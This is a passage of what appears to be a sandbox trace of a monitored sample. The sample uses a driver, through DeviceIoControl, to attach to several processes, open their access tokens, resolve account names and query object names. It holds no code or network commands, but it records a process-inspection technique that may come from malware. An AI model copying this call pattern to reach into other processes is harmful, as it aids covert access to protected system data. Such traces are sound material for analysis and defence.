(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x524) returned 0xc8 [0246.016] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.016] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001ff7950, HandleInformation=0x0) returned 0x0 [0246.016] ObOpenObjectByPointer (in: Object=0xfffffa8001ff7950, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.017] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x14 [0246.017] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.017] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.017] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.017] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.017] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.019] CloseHandle (hObject=0xc4) returned 1 [0246.019] CloseHandle (hObject=0xc8) returned 1 [0246.019] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.019] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.019] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.019] PsAcquireProcessExitSynchronization () returned 0x0 [0246.019] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880053c85d0) [0246.019] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fed070, HandleInformation=0x0) returned 0x0 [0246.019] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.019] PsReleaseProcessExitSynchronization () returned 0x2 [0246.019] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0246.019] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.019] ObfDereferenceObject (Object=0xfffffa8001fed070) returned 0x1 [0246.019] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.019] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.019] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.020] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0246.020] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.020] PsAcquireProcessExitSynchronization () returned 0x0 [0246.020] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880053c85d0) [0246.020] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fd8070, HandleInformation=0x0) returned 0x0 [0246.020] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.020] PsReleaseProcessExitSynchronization () returned 0x2 [0246.020] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0246.020] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.020] ObfDereferenceObject (Object=0xfffffa8001fd8070) returned 0x1 [0246.020] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.020] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.020] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.020] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.020] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.020] PsAcquireProcessExitSynchronization () returned 0x0 [0246.020] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880053c85d0) [0246.020] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.020] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.020] PsReleaseProcessExitSynchronization () returned 0x2 [0246.020] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0246.020] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.020] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.021] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.021] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x804) returned 0xc8 [0246.021] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.021] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002023890, HandleInformation=0x0) returned 0x0 [0246.021] ObOpenObjectByPointer (in: Object=0xfffffa8002023890, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.021] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x14 [0246.021] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.021] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.021] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.021] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.021] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.023] CloseHandle (hObject=0xc4) returned 1 [0246.023] CloseHandle (hObject=0xc8) returned 1 [0246.023] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.023] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.023] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.023] PsAcquireProcessExitSynchronization () returned 0x0 [0246.023] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880053c85d0) [0246.024] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fe3100, HandleInformation=0x0) returned 0x0 [0246.024] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.024] PsReleaseProcessExitSynchronization () returned 0x2 [0246.024] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0246.024] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.024] ObfDereferenceObject (Object=0xfffffa8001fe3100) returned 0x1 [0246.024] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.024] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.024] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.024] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0246.024] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.024] PsAcquireProcessExitSynchronization () returned 0x0 [0246.024] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880053c85d0) [0246.024] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800202a630, HandleInformation=0x0) returned 0x0 [0246.024] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.024] PsReleaseProcessExitSynchronization () returned 0x2 [0246.024] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0246.024] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.024] ObfDereferenceObject (Object=0xfffffa800202a630) returned 0x1 [0246.024] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.024] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.025] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.025] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.025] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.025] PsAcquireProcessExitSynchronization () returned 0x0 [0246.025] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880053c85d0) [0246.025] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.025] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.025] PsReleaseProcessExitSynchronization () returned 0x2 [0246.025] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0246.025] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.025] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.025] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.025] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x814) returned 0xc8 [0246.025] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.025] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002040640, HandleInformation=0x0) returned 0x0 [0246.025] ObOpenObjectByPointer (in: Object=0xfffffa8002040640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.025] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x14 [0246.025] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.025] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.026] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.026] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.026] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.028] CloseHandle (hObject=0xc4) returned 1 [0246.031] CloseHandle (hObject=0xc8) returned 1 [0246.031] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.031] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.031] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.031] PsAcquireProcessExitSynchronization () returned 0x0 [0246.031] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880053c85d0) [0246.032] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800206ad00, HandleInformation=0x0) returned 0x0 [0246.032] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.032] PsReleaseProcessExitSynchronization () returned 0x2 [0246.032] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0246.032] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.032] ObfDereferenceObject (Object=0xfffffa800206ad00) returned 0x1 [0246.032] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.032] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.032] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0246.032] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.032] PsAcquireProcessExitSynchronization () returned 0x0 [0246.032] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880053c85d0) [0246.032] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800206a260, HandleInformation=0x0) returned 0x0 [0246.032] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.032] PsReleaseProcessExitSynchronization () returned 0x2 [0246.032] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0246.032] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.032] ObfDereferenceObject (Object=0xfffffa800206a260) returned 0x1 [0246.032] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.032] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.032] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.032] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.033] PsAcquireProcessExitSynchronization () returned 0x0 [0246.033] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880053c85d0) [0246.033] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.033] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.033] PsReleaseProcessExitSynchronization () returned 0x2 [0246.033] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0246.033] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.033] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.033] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.033] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x824) returned 0xc8 [0246.033] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.033] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002088b30, HandleInformation=0x0) returned 0x0 [0246.033] ObOpenObjectByPointer (in: Object=0xfffffa8002088b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.033] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x14 [0246.033] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.033] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.033] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.033] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.034] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.036] CloseHandle (hObject=0xc4) returned 1 [0246.036] CloseHandle (hObject=0xc8) returned 1 [0246.036] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.036] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.036] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.036] PsAcquireProcessExitSynchronization () returned 0x0 [0246.036] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880053c85d0) [0246.036] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002042af0, HandleInformation=0x0) returned 0x0 [0246.036] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.036] PsReleaseProcessExitSynchronization () returned 0x2 [0246.036] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0246.036] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.036] ObfDereferenceObject (Object=0xfffffa8002042af0) returned 0x1 [0246.036] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.037] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.037] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.037] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, 